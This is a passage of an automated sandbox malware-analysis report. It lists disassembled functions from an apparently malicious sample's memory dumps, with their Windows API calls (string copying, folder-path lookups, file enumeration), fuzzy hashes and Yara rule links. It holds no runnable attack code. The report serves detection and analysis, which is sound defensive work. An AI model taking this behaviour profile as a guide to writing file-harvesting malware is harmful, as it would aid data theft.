                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `o@
                                                                                    • API String ID: 0-590292170
                                                                                    • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                    • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                                                    • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                    • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                                                    Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SystemTimelstrcpy
                                                                                    • String ID: cI@$cI@
                                                                                    • API String ID: 62757014-1697673767
                                                                                    • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                    • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                                                    • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                    • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                                                    Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                                                    • lstrcatA.KERNEL32(?,02E39CF8), ref: 004150A8
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                    • String ID: aA
                                                                                    • API String ID: 2699682494-2567749500
                                                                                    • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                    • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                                                    • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                    • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                                                    Function 02D1BCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1BF06
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • StrStrA.SHLWAPI(00000000,004213E0), ref: 02D1BF34
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1C00C
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1C020
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1440504306-0
                                                                                    • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                    • Instruction ID: a07429445f16bbd48e9e905924f60887a6ddb3dbb8f68fe17abe9d775e127a42
                                                                                    • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                    • Instruction Fuzzy Hash: CDB11C75910228EBCF18EBA0DD95EEE733AEF64708F504169E50662690EE346E4CCF71
                                                                                    Function 02D251A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D251E1
                                                                                    • lstrcat.KERNEL32(?,00421070), ref: 02D251FE
                                                                                    • lstrcat.KERNEL32(?,0064A5F8), ref: 02D25212
                                                                                    • lstrcat.KERNEL32(?,00421074), ref: 02D25224
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24B93
                                                                                      • Part of subcall function 02D24B77: FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
                                                                                      • Part of subcall function 02D24B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
                                                                                      • Part of subcall function 02D24B77: FindClose.KERNEL32(000000FF), ref: 02D24DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2667927680-0
                                                                                    • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                    • Instruction ID: f5a8541b64f9bf550549d44b5eeec0ffb5b853a3e91ac2b44e28492c8386360b
                                                                                    • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                    • Instruction Fuzzy Hash: FF21B87AA40218BBC714FBE0EC45EE9737AEB65300F404188764992280DE749ACDCFB1
                                                                                    Function 02D294C7 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1206339513-0
                                                                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction ID: 00bb18a8a58d96ce1557579acf3de89063e437dc9164e52b57040724408ed84d
                                                                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction Fuzzy Hash: ED010879640108FFCB04DFECD998EAE7BBAEB49394F108148F9098B300C631AA40CB95